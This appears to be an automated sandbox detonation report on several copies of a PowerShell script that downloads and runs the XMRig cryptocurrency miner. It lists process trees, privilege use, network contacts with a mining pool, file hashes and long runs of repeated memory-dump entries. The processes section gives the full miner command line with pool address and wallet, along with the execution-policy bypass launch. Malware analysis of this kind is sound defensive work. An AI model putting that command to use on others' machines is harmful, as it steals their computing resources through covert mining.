memory/2448-77-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-78-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-79-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-80-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-81-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-82-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-83-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-84-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-85-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-86-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-87-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-88-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-89-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-90-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-91-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-92-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-93-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-94-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-95-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-96-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-97-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-98-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-99-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-100-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-101-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-102-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-103-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-104-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-105-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-106-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-107-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-108-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-109-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-110-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-111-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-112-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-113-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-114-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-115-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-116-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:59

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1771s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

memory/3332-0-0x00007FFAA59E3000-0x00007FFAA59E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_53j0tgru.0iu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3332-6-0x000001C2A0920000-0x000001C2A0942000-memory.dmp

memory/3332-11-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/3332-12-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/3332-14-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/3332-15-0x000001C2B9B90000-0x000001C2B9BA2000-memory.dmp

memory/3332-16-0x000001C2A0780000-0x000001C2A078A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4016-47-0x0000026D147B0000-0x0000026D147D0000-memory.dmp

memory/4016-48-0x0000026D161D0000-0x0000026D161F0000-memory.dmp

memory/4016-49-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-50-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/3332-51-0x00007FFAA59E3000-0x00007FFAA59E5000-memory.dmp

memory/3332-52-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/4016-54-0x0000026D16210000-0x0000026D16230000-memory.dmp

memory/4016-53-0x0000026D161F0000-0x0000026D16210000-memory.dmp

memory/4016-55-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-56-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-57-0x0000026D161F0000-0x0000026D16210000-memory.dmp

memory/4016-58-0x0000026D16210000-0x0000026D16230000-memory.dmp

memory/4016-59-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-60-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-61-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-62-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-63-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-64-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-65-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-66-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-67-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-68-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-69-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-70-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-71-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-72-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-73-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-74-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-75-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-76-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-77-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-78-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-79-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-80-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-81-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-82-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-83-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-84-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-85-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-86-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-87-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-88-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-89-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-90-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-91-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-92-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-93-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-94-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-95-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-96-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-97-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-98-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-99-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-100-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-101-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-102-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-103-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-104-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-105-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-106-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-107-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-108-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-109-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-110-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-111-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-112-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-113-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-114-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-115-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-116-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-117-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:05

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/824-0-0x00007FFC6AE23000-0x00007FFC6AE25000-memory.dmp

memory/824-6-0x0000025F47440000-0x0000025F47462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hrnlhy5f.vua.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/824-11-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/824-12-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/824-14-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/824-15-0x0000025F48200000-0x0000025F48212000-memory.dmp

memory/824-16-0x0000025F474D0000-0x0000025F474DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2328-47-0x00000147B0380000-0x00000147B03A0000-memory.dmp

memory/2328-48-0x00000147B05E0000-0x00000147B0600000-memory.dmp

memory/824-50-0x00007FFC6AE23000-0x00007FFC6AE25000-memory.dmp

memory/2328-49-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/824-51-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/2328-54-0x00000147B0620000-0x00000147B0640000-memory.dmp

memory/2328-53-0x00000147B0600000-0x00000147B0620000-memory.dmp

memory/2328-52-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-55-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/824-56-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/2328-57-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-59-0x00000147B0620000-0x00000147B0640000-memory.dmp

memory/2328-58-0x00000147B0600000-0x00000147B0620000-memory.dmp

memory/2328-60-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-61-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-62-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-63-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-64-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-65-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-66-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-67-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-68-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-69-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-70-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-71-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-72-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-73-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-74-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-75-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-76-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-77-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-78-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-79-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-80-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-81-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-82-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-83-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-84-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-85-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-86-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-87-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-88-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-89-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-90-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-91-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-92-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-93-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-94-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-95-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-96-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-97-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-98-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-99-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-100-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-101-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-102-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-103-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-104-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-105-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-106-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-107-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-108-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-109-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-110-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-111-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-112-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-113-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-114-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-115-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-116-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-117-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/2328-118-0x00007FF633600000-0x00007FF634233000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:10

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

